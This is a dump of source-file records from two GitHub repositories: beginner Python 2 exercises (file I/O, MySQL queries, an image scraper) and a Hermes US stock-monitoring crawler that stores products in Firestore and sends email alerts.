"36360e1ee6c52c37f7f5781fe280d3e37e6ac678", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1490, "license_type": "no_license", "max_line_length": 74, "num_lines": 69, "path": "/App1/styio/ReadFile.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: Utf-8 -*-\nimport os\n\n\ndef readfile():\n if os.path.exists(\"/Users/arvin.chang/Documents/gitfile.txt\"):\n print \"true\"\n else:\n print \"false\"\n\n if os.access(\"/Users/arvin.chang/Documents/gitfile.txt\", os.R_OK):\n print \"Given file path is exist.\"\n\n try:\n file = open(\"/Users/arvin.chang/Documents/gitfile.txt\", \"r+\")\n # print file.name\n print file.closed\n print file.mode\n print file.softspace\n\n print file.read()\n\n print \"当前文件位置 : \", file.tell()\n\n # file.seek(0,2)\n\n except IOError:\n print(\"File is not accessible.\")\n file.close()\n\n\ndef wirteFile():\n if os.access(\"/Users/arvin.chang/Documents/gitfile.txt\", os.W_OK):\n print \"Given file path is exist.\"\n\n try:\n file = open(\"/Users/arvin.chang/Documents/gitfile.txt\", \"a+\")\n\n str1 = \"this is test content\\n\"\n\n file.write(str1)\n except IOError:\n print \"File is not accessible\"\n\n finally:\n\n file.close()\n\n\ndef createFolder():\n os.mkdir(\"newdir\")\n os.rmdir(\"newdir\")\n os.remove(\"test.sh\")\n\n\ndef styWith():\n if not os.access(\"/Users/arvin.chang/Documents/gitfile.txt\", os.W_OK):\n print \"Given file path is not exist.\"\n return\n\n with open(\"/Users/arvin.chang/Documents/gitfile.txt\", \"r+\") as f:\n print \"file content\", f.read();\n\n\nif __name__ == '__main__':\n # readfile()\n # wirteFile()\n # createFolder()\n styWith()\n" }, { "alpha_fraction": 0.5416666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 13.600000381469727, "blob_id": "4fb55f1890269fc78cb0ca743f85aa6e59fad1b0", "content_id": "00fcb6b3465d8a64a08c54a5a0d231045a7189b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 31, "num_lines": 5, "path": "/App1/LamdaFun.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "#-*-conding:UTF-8-*-\n\nsum=lambda arg1,arg2:arg1*arg2\n\n#print sum(10,21)" }, { "alpha_fraction": 0.5248227119445801, "alphanum_fraction": 0.5319148898124695, "avg_line_length": 10.833333015441895, "blob_id": "d64e35ab2e8ce1bf3e39baa41ba08fdf37256b4e", "content_id": "728fc30f1d6cd6980a07ed0d5790fe321296aa8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 141, "license_type": "no_license", "max_line_length": 30, "num_lines": 12, "path": "/App1/styio/MainTest.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport ReadInput\n\ndef main():\n print(\"main test process\")\n\n ReadInput\n\n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6440678238868713, "alphanum_fraction": 0.6610169410705566, "avg_line_length": 15.181818008422852, "blob_id": "ba22fc5268d0a8b1084d8cad77f394c4c88dd204", "content_id": "9022fe093d43f259c1181eef8213fe515dd403b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 30, "num_lines": 11, "path": "/App1/styio/ReadInput.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\n\n# read str content\nstr=raw_input(\"pls input: \")\nprint \"raw input 
content:\",str\n\n\n#read el content\nstr1=input(\"pls input:\" )\n\nprint \"input content:\",str1" }, { "alpha_fraction": 0.5552569627761841, "alphanum_fraction": 0.5653342008590698, "avg_line_length": 26.831775665283203, "blob_id": "40154087d5836bb133a96befe47d376a7425911a", "content_id": "be50d2e00e4a5cb3248ca2eacfa2e5fe9708e86e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3049, "license_type": "no_license", "max_line_length": 117, "num_lines": 107, "path": "/App1/QueryDB.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport MySQLdb\nimport traceback\n\n# open connection\ndb = MySQLdb.connect(\"localhost\", \"py\", \"123456\", \"pydb\");\n# 用cursor()方法获取操作游标\ncursor = db.cursor();\n# 使用execute方法执行SQL语句\n# cursor.execute(\"SELECT VERSION()\");\n\n# 使用 fetchone() 方法获取一条数据库。\n# data = cursor.fetchone();\n\n# print \"Database version : %s \" % data;\n\n# cursor.execute(\"DROP TABLE IF EXISTS TEST_DB\");\n\n# 创建数据表SQL语句\nsql = \"\"\"CREATE TABLE TEST_DB (\n FIRST_NAME CHAR(20) NOT NULL,\n LAST_NAME CHAR(20),\n AGE INT, \n SEX CHAR(10),\n INCOME FLOAT)\"\"\"\n\n# cursor.execute(sql);\n\n\n# insert\ninsert_sql = \"\"\"insert into TEST_DB(FIRST_NAME,LAST_NAME,AGE,SEX,INCOME)VALUES ('arvin','Chang',26,'male',1000.0);\"\"\"\n\n# try:\n# count=0;\n# for index in range(1,20):\n# data=cursor.execute(insert_sql);\n# count+=data;\n# print count;\n# db.commit();\n# except Exception, e:\n# print 'str(Exception):\\t', str(Exception)\n# print 'str(e):\\t\\t', str(e)\n# print 'repr(e):\\t', repr(e)\n# print 'e.message:\\t', e.message\n# print 'traceback.print_exc():'; traceback.print_exc()\n# print 'traceback.format_exc():\\n%s' % traceback.format_exc()\n# db.rollback();\n\nupdate_sql = \"\"\"update TEST_DB set age=28\"\"\"\n# try:\n# data=cursor.execute(update_sql);\n# print data;\n# db.commit();\n# except Exception,e:\n# print 'str(Exception):\\t', str(Exception)\n# print 'str(e):\\t\\t', str(e)\n# print 'repr(e):\\t', repr(e)\n# print 'e.message:\\t', e.message\n# print 'traceback.print_exc():'; traceback.print_exc()\n# print 'traceback.format_exc():\\n%s' % traceback.format_exc()\n# db.rollback();\n\nquery_testdb_sql = \"\"\"select * from test_db\"\"\"\n\ntry:\n cursor.execute(query_testdb_sql);\n results = cursor.fetchall();\n\n list_test = list();\n\n for row in results:\n frist_name = row[0];\n last_name = row[1];\n age = row[2];\n sex = row[3];\n # print frist_name,sex;\n # testDB=TestDB;\n # testDB.first_name=frist_name;\n # testDB.last_name=last_name;\n # testDB.age=age;\n # list_test.__add__(testDB);\n li = {'first_name': frist_name, 'last_name': last_name, 'age': age, 'sex': sex};\n list_test.append(li);\n print list_test.__len__();\n print list_test;\n for li in list_test:\n if li.get('first_name') == 'arvin':\n print li.get('first_name')\n else:\n print 'false'\n\n if li.has_key('last_name'):\n print 'has key last_name'\n else:\n print 'not found key last_name'\nexcept Exception, e:\n print 'str(Exception):\\t', str(Exception)\n print 'str(e):\\t\\t', str(e)\n print 'repr(e):\\t', repr(e)\n print 'e.message:\\t', e.message\n print 'traceback.print_exc():';\n traceback.print_exc()\n print 'traceback.format_exc():\\n%s' % traceback.format_exc()\n db.rollback();\n\n# close connection\ndb.close();" }, { "alpha_fraction": 0.5072463750839233, "alphanum_fraction": 0.5507246255874634, "avg_line_length": 16.25, "blob_id": "015561534a5da184440a8a765ca25222b80a4870", "content_id": 
"3b8cf5673438f620d01a1a96058e0fa35055d2b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/App1/component/Script1.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding:UTF-8 -*-\n\ndef script1():\n print \"this is script 1\"\n" }, { "alpha_fraction": 0.4010416567325592, "alphanum_fraction": 0.40625, "avg_line_length": 8, "blob_id": "6a6744112f995624d18ef756dde21a322c379268", "content_id": "279836892b721cd45db9ffadbf1af7adee143b08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 380, "license_type": "no_license", "max_line_length": 38, "num_lines": 21, "path": "/App1/rename_images_script.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "#-*- coding: UTF-8 -*-\n\n'''\n读取指定目录下的所有文件对名字做修改\n'''\n\n\n# 遍历指定目录,显示目录下的所有文件名\n\n\n\nif __name__ == '__main__':\n\n print \"》》》》》》》》》》开始处理图片《《《《《《《《《《《《《\"\n\n\n\n\n\n\n print \"》》》》》》》》》》始处理图片结束《《《《《《《《《《《《\"\n\n\n\n" }, { "alpha_fraction": 0.47454702854156494, "alphanum_fraction": 0.5168248414993286, "avg_line_length": 16.560606002807617, "blob_id": "bcaf8e031ef4c9c69060286aa1dbda5fb72ec570", "content_id": "5f5e119060ff46ebefc42b35dda47f88ca4cbbf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1165, "license_type": "no_license", "max_line_length": 52, "num_lines": 66, "path": "/App1/functions/Utils.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: Utf-8 -*-\n\ndef funs():\n tuple1 = (\"1\", \"2\", \"3\", \"a\", \"b\", 0);\n\n print \"bulid in function\"\n print \"absolute value\", abs(-998)\n print \"all method:\", all(tuple1)\n for row in tuple1:\n\n if str == type(row):\n\n print ord(row)\n else:\n print \"not str\", row\n # hash code\n # print hash(row)\n print memoryview(row)\n\n\nclass Demo1(object):\n @staticmethod\n def outPrint():\n print \"this is static method\"\n\n\nclass Demo2(object):\n def outPrint(self):\n print \"this is general method\";\n\n\nclass Demo3(object):\n\n def __init__(self):\n pass\n\n\ndef sty_map():\n print map(lambda x: x * 10, [1, 3, 8, 9, 87])\n\n\ndef styFilter():\n print filter(lambda x:x>10,[10,19,18,29,8,9,23])\n\ndef sty_zip():\n tuple1=(1,2,3);\n tuple2 = (\"a\", \"b\", \"c\");\n tuple3 = (\"我\", \"是\", \"谁\");\n zipped=zip(tuple1, tuple2,tuple3)\n print zipped\n print zip(*zipped)\n\n\n\nif __name__ == '__main__':\n\n # funs()\n # static method\n # Demo1.outPrint()\n\n # general method\n # demo2 = Demo2()\n # demo2.outPrint()\n # sty_map()\n # styFilter()\n sty_zip()\n" }, { "alpha_fraction": 0.5072463750839233, "alphanum_fraction": 0.5507246255874634, "avg_line_length": 16.25, "blob_id": "212ac17449b59c6f0c461011cda4410de67b1658", "content_id": "28bc5ccf1d500df228a24eaf4871c501212cfc81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/App1/component/Script2.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding:UTF-8 -*-\n\ndef script2():\n print \"this is script 2\"\n" }, { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.739130437374115, "avg_line_length": 10.5, "blob_id": "3a303cc56b30507fc4af8a16ed2455fa62e14da9", "content_id": 
"67d31cbf30f04ebe48bf085da80947b1b245d922", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 23, "license_type": "no_license", "max_line_length": 14, "num_lines": 2, "path": "/README.md", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# py-workspace\nstay py\n" }, { "alpha_fraction": 0.7246376872062683, "alphanum_fraction": 0.739130437374115, "avg_line_length": 22.33333396911621, "blob_id": "28c0833b18aa867fe0dd8723a02ebb5f0994eb91", "content_id": "c41ec21804ec6e1c4333841153a0a47d0ed1485f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 53, "num_lines": 3, "path": "/App1/Helloword.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# coding utf-8\n\nprint('hello world ,this is my first python pargram')" }, { "alpha_fraction": 0.5516840815544128, "alphanum_fraction": 0.5609756112098694, "avg_line_length": 19.5238094329834, "blob_id": "83c5475233b377a7d85a505cea31cd0ed76811b9", "content_id": "73b7bf196efc6f3aecfd8be358e0ab5f23024f7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 861, "license_type": "no_license", "max_line_length": 104, "num_lines": 42, "path": "/App1/DouBanCrawler.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# coding utf-8\nimport urllib\nimport re\nfrom __builtin__ import str\n\npath = \"/Users/arvin.chang/Images/webCrawler/\";\n\n\ndef getHTMLByURL(url):\n print url;\n page = urllib.urlopen(url);\n html = page.read();\n return html;\n\n\ndef getImg(html):\n # print html;\n reg = r'src=\"(.+?\\.jpg)\"'\n imgre = re.compile(reg);\n imgList = re.findall(imgre, html);\n print imgList;\n return imgList;\n\n\ndef wirteImg(imgList, x):\n y = 1;\n for imgurl in imgList:\n print imgurl\n z = str(x) + \"-\" + str(y);\n urllib.urlretrieve(imgurl, path + '%s.jpg' % z);\n y += 1;\n\n\ndef main():\n for index in range(1, 20):\n html = getHTMLByURL(\"http://www.dbmeinv.com/dbgroup/show.htm?cid=6&pager_offset=\" + str(index));\n # wirteImg(getImg(html),index);\n index += 1;\n\n\nif __name__ == '__main__':\n main();" }, { "alpha_fraction": 0.5561097264289856, "alphanum_fraction": 0.5660848021507263, "avg_line_length": 16.434782028198242, "blob_id": "c0befbf0bd2c8a6e002d77044a4913b8a58e095b", "content_id": "9655d3c0fbbe2208327b0919878797c92602229b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 401, "license_type": "no_license", "max_line_length": 61, "num_lines": 23, "path": "/App1/exception/styException.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: Utf-8 -*-\n\ndef styExc(args1):\n try:\n\n print \"\", int(args1)\n\n raise BussniessException,\"this is BussniessException\"\n\n except BaseException,e:\n print \"exception:\",e\n\n else:\n print \"no exception\"\n\n\nclass BussniessException(RuntimeError):\n def __init__(self, arg):\n self.args = arg\n print arg\n\nif __name__ == '__main__':\n styExc(5)\n" }, { "alpha_fraction": 0.543749988079071, "alphanum_fraction": 0.5687500238418579, "avg_line_length": 16.14285659790039, "blob_id": "8a81c7c426be19213c980a82ef88b7ccb7a35af8", "content_id": "197096cfb66fb63f1b628270c40f5aaec6344c09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 498, "license_type": 
"no_license", "max_line_length": 61, "num_lines": 28, "path": "/App1/ConnectionDB.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\n\nimport MySQLdb\n\n\ndef connctionMySQL():\n # open connection\n db = MySQLdb.connect(\"localhost\", \"py\", \"123456\", \"pydb\")\n\n # 用cursor()方法获取操作游标\n cursor = db.cursor()\n\n query_sql = \"\"\"select * from test_db limit 10\"\"\"\n\n cursor.execute(query_sql)\n\n results = cursor.fetchall ()\n\n for row in results:\n print row[2]\n print id(row[2])\n print row[4]\n\n # len\n print len(results)\n\n cursor.close()\n db.close()\n" } ]
15
zhouchangju1991/hermes_us
https://github.com/zhouchangju1991/hermes_us
30634da11de8e556f4ee7f53a79fc0f6cef91f38
07bf9f8ad98842149aab90aa430069aff681329c
c2879a24d1639cbec9a23c4c880a84b2ecfec9f3
refs/heads/master
2023-01-24T17:07:46.636476
2020-11-28T06:51:54
2020-11-28T06:51:54
316,663,841
4
4
null
null
null
null
null
[ { "alpha_fraction": 0.6459657549858093, "alphanum_fraction": 0.6459657549858093, "avg_line_length": 31.983871459960938, "blob_id": "13e2f2cad5d4cbb2736f17c30b9f794f01e4c514", "content_id": "28fd1496170ca4bce95d283cbf8d7efb919d7c19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4090, "license_type": "no_license", "max_line_length": 110, "num_lines": 124, "path": "/main.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport pytz\nfrom crawler import Crawler\nfrom database import Database\nfrom mailer import Mailer\nfrom log import Log\n\n# Creates a log object. The log file name is today's date.\nlog = Log()\n\n# Create database object\ntry:\n database = Database()\nexcept Exception as exception:\n log.error('Fail to create Database object. Error message: {}'.format(exception))\n exit()\n\n# Create crawler object\ntry:\n crawler = Crawler()\nexcept Exception as exception:\n log.error('Fail to create Crawler object. Error message: {}'.format(exception))\n exit()\n\n# Create email object\ntry:\n mailer = Mailer()\nexcept Exception as exception:\n log.error('Fail to create Mailer object. Error message: {}'.format(exception))\n exit()\n\ndef main():\n keyword_docs = database.collection('hermes_us_keyword').where('is_valid', '==', True).stream()\n keywords = [doc.to_dict()['keyword'] for doc in keyword_docs]\n skus = []\n for keyword in keywords:\n for sku in crawler.fetch_skus_by_keyword(keyword):\n if sku in skus:\n continue\n product = crawler.fetch_product_by_sku(sku, keyword)\n if not product or not product['published']:\n log.info('{} is fetched while the product is out of stock'.format(sku))\n continue\n check_product(product)\n skus.append(sku)\n\n log.info('{} skus are fetched from {} keywords'.format(len(skus), len(keywords)))\n check_unpublish_products(keywords, skus)\n\ndef check_product(product):\n sku = product['sku']\n product_prev = database.document('hermes_us_product', sku).get().to_dict()\n\n if not product_prev:\n # Insert the product into the database if not exists\n create_product(product)\n mailer.send_email(product, 'published', product['updated_at'])\n elif not product_prev['published']:\n update_product_by_product(product, product_prev)\n mailer.send_email(product, 'republished', product['updated_at'])\n\ndef create_product(product):\n timestamp = product['updated_at']\n\n product['created_at'] = timestamp\n product['last_published_at'] = timestamp\n product['historical_publish'] = [{\n 'publish': True,\n 'timestamp': timestamp,\n }]\n product['published'] = True\n\n database.udpate_product_to_database(product, merge=False) \n\ndef update_product_by_product(product, product_prev):\n timestamp = product['updated_at']\n is_publish = product['published']\n\n if is_publish:\n product['last_published_at'] = timestamp\n\n product['historical_publish'] = product_prev['historical_publish']\n if is_publish != product_prev['published']:\n product['historical_publish'].append({\n 'publish': is_publish,\n 'timestamp': timestamp,\n })\n\n database.udpate_product_to_database(product, merge=False)\n\ndef update_product_publish_by_sku(sku, product_prev, is_publish):\n timestamp = datetime.now(pytz.timezone('US/Pacific'))\n product = {\n 'sku': sku,\n 'updated_at': timestamp,\n 'historical_publish': product_prev['historical_publish'],\n 'published': is_publish,\n }\n\n if is_publish:\n product['last_published_at'] = timestamp\n\n if is_publish != 
product_prev['published']:\n product['historical_publish'].append({\n 'publish': is_publish,\n 'timestamp': timestamp,\n })\n\n database.udpate_product_to_database(product, merge=True)\n\ndef check_unpublish_products(keywords, skus):\n timestamp = datetime.now(pytz.timezone('US/Pacific'))\n published_products_docs = database.collection('hermes_us_product').where('published', '==', True).stream()\n for doc in published_products_docs:\n product_prev = doc.to_dict()\n if product_prev['keyword'] not in keywords:\n continue\n sku = product_prev['sku']\n if sku not in skus:\n update_product_publish_by_sku(sku, product_prev, False)\n mailer.send_email(product_prev, 'unpublished', timestamp)\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.8081181049346924, "alphanum_fraction": 0.8081181049346924, "avg_line_length": 107.4000015258789, "blob_id": "fe475e93cd73d9f45ee0f51c589c60169a1fa017", "content_id": "2b04009c42408c9dba4db31b3ede4f8f4a9038c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 542, "license_type": "no_license", "max_line_length": 271, "num_lines": 5, "path": "/README.md", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "The project is built on Google Cloud Compute Engine. Credential-related files are ignored and not uploaded to github.\n\nThis project fetches the near real time stock information from Hermes US website and send notifications when some products are published/unpublished.\n\nmain.py contains the logic for the whole process. main() in main.py is scheduled to be called every minute. database.py is for read / write to firestore database. crawler.py is for crawling Hermes US website. mailer.py is for sending notifications. log.py is for logging.\n" }, { "alpha_fraction": 0.6256517171859741, "alphanum_fraction": 0.6277372241020203, "avg_line_length": 32.068965911865234, "blob_id": "84efc67eff9907f73522bb789935b594ac5984d2", "content_id": "25b85abded8bdf7afe2776576984234eb2c5449f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 959, "license_type": "no_license", "max_line_length": 103, "num_lines": 29, "path": "/upload_log_to_storage.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "import os, pytz\nfrom storage import Storage\nfrom datetime import datetime, timedelta\n\nstorage = Storage()\n\ndef upload_log():\n today_log = 'hermes_us_{}.log'.format(datetime.now(pytz.timezone('US/Pacific')).strftime('%Y%m%d'))\n log_dir = '{}/log/'.format(os.path.dirname(os.path.realpath(__file__)))\n for log_name in os.listdir(log_dir):\n if log_name >= today_log:\n continue\n source = '{}/{}'.format(log_dir, log_name)\n storage.upload_log(source, log_name)\n os.remove(source)\n\n# Removes logs that are created at or before gap_days ago.\ndef remove_old_logs(gap_days):\n date = datetime.now(pytz.timezone('US/Pacific')).strftime('%Y%m%d') - timedelta(days=gap_days)\n earlist_log = 'hermes_us_{}.log'.format(date)\n for log in storage.list_logs():\n if log < earlist_log:\n storage.delete_log(log)\n\nif __name__ == '__main__':\n gap_days = 30\n remove_old_logs(gap_days)\n\n upload_log()\n" }, { "alpha_fraction": 0.4976213276386261, "alphanum_fraction": 0.5004757642745972, "avg_line_length": 36.53571319580078, "blob_id": "161b589aa8cb781f5d378e05c76db2176c143f7e", "content_id": "a030be05bba6cc3419eef4011bded03b481d3320", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 2102, "license_type": "no_license", "max_line_length": 111, "num_lines": 56, "path": "/mailer.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "import os\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail, From, To, Subject, PlainTextContent, HtmlContent\nimport config\n\nclass Mailer:\n def __init__(self):\n self.__sg = SendGridAPIClient(config.send_grid_api_key)\n\n def send_email_base(self, from_email, to_emails, subject, html_content):\n message = Mail(from_email=From(from_email),\n to_emails=[To(to_email) for to_email in to_emails],\n subject=Subject(subject),\n html_content=HtmlContent(html_content))\n return self.__sg.send(message)\n\n def send_email_to_me(self, subject, html_content):\n return self.send_email_base(\n from_email='[email protected]',\n to_emails=['[email protected]'],\n subject=subject,\n html_content=html_content) \n\n def send_email(self, product, action, timestamp):\n time = '{} PT'.format(timestamp.strftime(\"%Y-%m-%d, %H:%M:%S\"))\n pattern = product['pattern']\n color = product['color']\n url = product['url']\n has_image = False\n if len(product['images']) > 0:\n has_image = True\n image = product['images'][0]\n\n subject = 'Hermes US {} {} - {} at {}'.format(action, pattern, color, time)\n if has_image:\n html_content = '''\n <div>\n <a href='{}' style='font-size:14px; font-weight:bold; color:black; text-decoration: none;'>\n {} - {}\n </a>\n </div>\n <br/>\n <div>\n <a href='{}'><img src='{}' /></a>\n </div>\n '''.format(url, pattern, color, url, image)\n else:\n html_content = '''\n <div>\n <a href='{}' style='font-size:14px; font-weight:bold; color:black; text-decoration: none;'>\n {} - {}\n </a>\n </div>\n '''.format(url, pattern, color)\n\n self.send_email_to_me(subject=subject, html_content=html_content)\n" }, { "alpha_fraction": 0.5734597444534302, "alphanum_fraction": 0.5876777172088623, "avg_line_length": 27.133333206176758, "blob_id": "5387b302ce67c1cea2fe0dba97503d413798ed65", "content_id": "8c90abab4eaf935e62c3e46ab107d1c7c54cbd1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 844, "license_type": "no_license", "max_line_length": 81, "num_lines": 30, "path": "/add_keyword_to_database.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport pytz\nfrom database import Database\n\ndatabase = Database()\n\nkeywords = ['evelyne 16 amazone bag',\n 'herbag zip 31',\n 'picotin lock 18',\n 'picotin lock 22',\n 'kelly classique to go',\n 'lindy 26',\n 'lindy mini',\n 'roulis mini',\n 'roulis 23',\n 'rodeo',\n 'constance long to go',\n 'oran nano',]\nfor keyword in keywords:\n timestamp = datetime.now(pytz.timezone('US/Pacific'))\n document_name = keyword.lower().replace(' ', '_')\n data = {\n 'keyword': keyword,\n 'is_valid': True,\n 'created_at': timestamp,\n 'updated_at': timestamp,\n }\n\n if not database.document('hermes_us_keyword', document_name).get().to_dict():\n database.update_document('hermes_us_keyword', document_name, data, False)\n" }, { "alpha_fraction": 0.5730735063552856, "alphanum_fraction": 0.5876882076263428, "avg_line_length": 40.814815521240234, "blob_id": "09a0cbeb1e44f3ad4f2c0f0918055785cc4c76cf", "content_id": "6d3702a9f10f11601ceef6675c8cd2f61e73b26f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2258, "license_type": "no_license", "max_line_length": 137, "num_lines": 
54, "path": "/crawler.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "import requests, json\nfrom datetime import datetime\nimport pytz\n\nclass Crawler:\n def __init__(self):\n self.__request_session = requests.Session()\n self.__request_headers = {\n 'accept-language': 'en-US,en;q=0.9',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',\n }\n\n def fetch_skus_by_keyword(self, keyword):\n skus = []\n initial_response = self.__get('https://bck.hermes.com/product?locale=us_en&searchterm={}'.format(keyword))\n products_num = json.loads(initial_response.text)['total']\n offset = 0\n while offset < products_num:\n products_response = self.__get('https://bck.hermes.com/product?locale=us_en&searchterm={}&offset={}'.format(keyword, offset))\n products_json = json.loads(products_response.text)\n products = products_json['products']['items']\n for product in products:\n skus.append(product['sku'])\n offset += 36\n\n return skus\n\n def fetch_product_by_sku(self, sku, keyword):\n response = self.__get('https://bck.hermes.com/product-page?locale=us_en&productsku={}'.format(sku))\n product_json = json.loads(response.text)\n product = {\n 'sku': sku,\n 'pattern': formalize(product_json['title']),\n 'images': ['https:{}'.format(image['url']) for image in product_json['assets']],\n 'price': product_json['price'],\n 'url': 'https://www.hermes.com{}'.format(product_json['url']),\n 'slug': formalize(product_json['slug']),\n 'published': product_json['hasStock'],\n 'description_html': product_json['simpleAttributes']['description'],\n 'dimension': product_json['simpleAttributes']['dimensions'],\n 'color': product_json['simpleAttributes']['colorHermes'],\n 'updated_at': datetime.now(pytz.timezone('US/Pacific')),\n 'keyword': keyword,\n }\n\n return product\n\n def __get(self, url):\n return self.__request_session.get(url, headers=self.__request_headers)\n\ndef formalize(s):\n if None == s or '' == s:\n return ''\n return s.lower().strip()\n" }, { "alpha_fraction": 0.6853448152542114, "alphanum_fraction": 0.6853448152542114, "avg_line_length": 34.69230651855469, "blob_id": "92aafb024208cebcf2cd8d9478afe2957d92586d", "content_id": "3c1a7cbc03aaad58c53703ddb54b88705d979915", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 928, "license_type": "no_license", "max_line_length": 101, "num_lines": 26, "path": "/storage.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "from google.cloud import storage\nimport config\n\nlog_bucket_name = 'nanazhou_hermes_us_log'\n\nclass Storage:\n def __init__(self):\n self.__client = storage.Client.from_service_account_json(config.service_credential_file_name)\n \n def upload(self, bucket_name, source_file_name, destination_file_name):\n bucket = self.__client.bucket(bucket_name)\n destination = bucket.blob(destination_file_name)\n destination.upload_from_filename(source_file_name)\n\n def upload_log(self, source_file_name, destination_file_name):\n self.upload(log_bucket_name, source_file_name, destination_file_name)\n\n def delete(self, bucket_name, blob_name):\n blob = self.__client.bucket(bucket_name).blob(blob_name)\n blob.delete()\n\n def delete_log(self, log_name):\n self.delete(log_bucket_name, log_name)\n\n def list_logs(self):\n return self.__client.list_blobs(log_bucket_name)\n" }, { "alpha_fraction": 0.5947888493537903, "alphanum_fraction": 0.5947888493537903, "avg_line_length": 
32.69696807861328, "blob_id": "fcdeae58e85711a6ffca0067fa08e6b44a76b34b", "content_id": "28e1be3774aac796d9f8eb56a187a3fe2d1dda83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1113, "license_type": "no_license", "max_line_length": 104, "num_lines": 33, "path": "/log.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport logging, pytz, os\nfrom pytz import timezone, utc\n\nclass Log:\n def __init__(self):\n today = datetime.now(pytz.timezone('US/Pacific')).strftime('%Y%m%d')\n file_name = '{}/log/hermes_us_{}.log'.format(os.path.dirname(os.path.realpath(__file__)), today)\n logging.basicConfig(filename=file_name,\n filemode='a',\n level=logging.INFO,\n format=\"%(asctime)s %(levelname)s: %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\")\n logging.Formatter.converter = self.__PacificTime\n self.__logger = logging.getLogger(__name__)\n\n def __PacificTime(*args):\n utc_dt = utc.localize(datetime.utcnow())\n pt_tz = timezone(\"US/Pacific\")\n converted = utc_dt.astimezone(pt_tz)\n return converted.timetuple()\n\n def debug(self, message):\n self.__logger.debug(message)\n\n def info(self, message):\n self.__logger.info(message)\n\n def warning(self, message):\n self.__logger.warning(message)\n\n def error(self, message):\n self.__logger.error(message)\n\n" }, { "alpha_fraction": 0.703406810760498, "alphanum_fraction": 0.703406810760498, "avg_line_length": 37.38461685180664, "blob_id": "60c4e8b72043e2e4413a9105d6ea7bf24f63ffe4", "content_id": "1c6ba1b5865d92e705a6140ae48810daddcc8f48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 998, "license_type": "no_license", "max_line_length": 81, "num_lines": 26, "path": "/database.py", "repo_name": "zhouchangju1991/hermes_us", "src_encoding": "UTF-8", "text": "import firebase_admin\nfrom 